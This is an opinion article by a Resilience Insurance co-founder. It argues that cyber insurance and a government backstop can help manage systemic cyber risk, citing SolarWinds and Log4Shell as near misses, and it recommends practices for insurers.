Cyber Insurance and the National Cybersecurity Strategy

The Cyber Insurance industry can help stabilize global cyber risk.

Here’s how.

So far, it’s been more subtle than a massive attack against the US power grid, but threats to critical infrastructure are growing as geopolitics get more complex.?

Security firm Dragos reported that the Pipedream malware, launched by hackers linked to Russia, recently attempted to take down “around a dozen” U.S. electric and liquid natural gas sites. Ransomware attacks targeting the health sector have driven hospitals hit by a cyberattack to a 20% reported increase in mortality afterward. And multiple municipalities, LA Unified School District and Oakland, California, have recently had thousands of citizens, students, and employees’ private data dumped onto the dark web, where criminals can leverage it for fraud and future phishing attacks.

With the backdrop of these dramatic attacks, the 2023 U.S. National Cybersecurity Strategy, announced last week, acknowledged that the threat of cyber disruption to critical infrastructure was so high that U.S. Federal regulators would begin using existing health and safety regulations to audit the cybersecurity integrity of critical infrastructure like water and pipelines.

The primary challenge with cyber attacks is the unknown nature of the risk. No one is sure what the “big one” in cyber will look like, when it will come, or what it will cost.

Resilience believes cyber insurance provides a powerful stabilizing force that overlays the existing cybersecurity domain. Insurance encourages policyholders to utilize strong cybersecurity standards, controls, and best practices and provides enhanced access to mitigation and response resources if an incident occurs.

As a former Congressional staffer, I have seen no shortage of legislative overreach in times of crisis. The cyber insurance market cannot afford knee-jerk reactions from policymakers when thousands of US networks are locked up by a new wormable crypto-malware or major metropolitan regions are scrambling to restore heat in the winter because of a common vulnerability in electric substations’ industrial control systems.

This is why Resilience joined leading security companies as a member of the Cybersecurity Coalition in writing in support of the US Treasury’s work to explore the issue of establishing a cyber insurance backstop to help address more considerable systemic level cyber risks.?

The cyber insurance market has seen the problem coming for some time. In 2019, I along with employees from companies such as Microsoft and Marsh, joined together to identify some of the sources of systemic risk that could lead to failures of the cyber insurance market. The report recommended?

“Increasing overall capacity in the cyber insurance market to handle a major, multi-market loss through the creation of a government backstop for systemic cyber incidents, similar to those created for terrorist events (TRIA in the U.S. and Pool Re in the UK). A private reinsurance pool is imagined as the most appropriate model for cyber insurance, which could include the following: certification of an incident by a government official as eligible for coverage under the program, a requirement that all primary insurers offer cyber coverage to commercial clients, multi-line coverage, and incentives for consumers and service providers to invest in cybersecurity.”

Since then, the insurance market has seen several “near miss” events that could have easily triggered catastrophic losses across the insurance market.

The SolarWinds supply chain attack of 2020 targeted several US government agencies, including the Department of Defense, and private companies, including Microsoft and FireEye. This attack had the potential for a systemic threat due to the use of a vulnerability in the widely used SolarWinds Orion software to allow a highly advanced adversary to gain access to a broad range of organizations.?

However, while the attack was highly sophisticated, the attackers were primarily focused on government data theft rather than system manipulation or destruction. This and the primary targeting of US government entities significantly lowered the attack's impact on the cyber insurance market.

The Log4Shell vulnerability of 2021 was a second near miss for the cyber insurance market.?This critical vulnerability in the popular open-source logging tool, Apache Log4j, allows attackers to execute arbitrary code remotely. It is considered highly severe because threat actors can exploit it with just one specially crafted HTTP request or network packet, and it affects a wide range of systems and applications that use Log4j.?

While this vulnerability represents a disaster scenario if fully leveraged by criminals, the security community reacted quickly and cooperatively to develop and distribute patches as widely as possible upon release. While criminal groups today have been observed leveraging this vulnerability, the publicity surrounding it drove most organizations to implement this patch before criminals could widely exploit it.

Given the increase in threat to critical infrastructure and the number of near misses we are seeing, the government has an opportunity to begin a conversation with the insurance industry on how to work together to tackle these looming issues.?

In advance of this discussion, however, there is more the insurance industry can do today to reduce the impact of these types of risks on clients and capacity providers.?

1. First, regularly scan and warn all clients about critical vulnerabilities being exploited and have actionable mitigations. When Log4Shell was discovered, the Resilience Security team immediately checked all its clients and followed up directly with remediation actions. If there is a highly “contagious” vulnerability, we will ensure we are a part of the immune system response.
2. Second, leverage data-driven frameworks like the NIST Cybersecurity Framework and CIS Critical Controls as a part of underwriting and guidance to clients. Resilience leverages these tools in our modeling to ensure that our clients and capital placement follow the most up-to-date guidance on cyber hygiene.
3. Finally, use data tools to understand and model your portfolio risk. This has been a long-term goal for Resilience to help provide visibility to capital providers on sources of systemic risk. This drives proactive mitigations into our client base through guidance and policy language when we see trends that could lead to massive systemic level losses.

These concrete steps taken across the market help mitigate capital exposure to unforeseen systemic events and, more importantly, the potential for harm to our clients and global critical infrastructure.?

The attacker will always have the edge in imagination, but failing to explore the conversation will guarantee disaster. With the Administration opening the door for discussion, the industry should appear at the table.?

Learn more about Resilience at www.cyberresilience.com.

Enjoyed this article??Share it with your network, and follow?Resilience?for more #CyberInsurance and #CyberResilience content.

About the Author

Davis Hake is the Co-Founder and Vice President of Communications and Policy at Resilience Insurance. Prior to starting at Resilience in 2016, Hake managed cybersecurity strategy for Palo Alto Networks , served on the National Security Council, The White House , and was a lead author of cybersecurity legislation in the U.S. Congress. Hake is also currently an Adjunct Professor of Cyber Risk Management at the University of California, Berkeley and a Term Member of the Council on Foreign Relations.?